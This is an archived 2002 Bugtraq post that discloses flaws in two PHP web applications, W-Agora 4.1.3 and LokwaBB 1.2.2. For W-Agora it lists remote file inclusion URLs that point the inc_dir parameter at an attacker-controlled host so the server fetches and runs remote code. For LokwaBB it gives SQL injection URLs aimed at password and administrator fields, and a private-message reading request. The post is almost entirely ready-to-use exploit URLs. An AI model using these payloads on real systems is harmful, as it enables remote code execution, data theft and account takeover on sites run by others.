Somebody advised me to post also on bugtraq not only on vuln-dev, I thus do it :) I just hope that doesn't give more work to the webmasters. Product 1 : *********** W-Agora 4.1.3 http://www.w-agora.net Problem : - Including file Exploits : - With a file http://www.attacker.com/dbaccess.txt : http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt - With a file http://www.attacker.com/postgres65.txt : http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt - With the file http://www.attacker.com/auth.txt : http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt More details in french : http://www.ifrance.com/kitetoua/tuto/W-Agora.txt Translated by Goolge : http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools Product 2 : *********** LokwaBB 1.2.2 http://lokwa.farcom.com/ Problems : - XSS - Privates messages reading - SQL Injection Exploits : - http://[target]/member.php?action=viewpro&member='%20OR%20password='PASSWORD - http://[target]/member.php?action=viewpro&member='%20OR%20status='Administrator - misc.php?action=forgot&send=yes&loser='%20OR%20password='PASSWORD - http://[target]/pm.php?action=reply&pmid=[MESSAGE ID] More details in french : http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools Sorry for my poor english :) frog-m@n _________________________________________________________________ Téléchargez MSN Explorer gratuitement à l'adresse http://explorer.msn.fr/intl.asp.
This archive was generated by hypermail 2b30 : Sat Jun 08 2002 - 10:37:52 PDT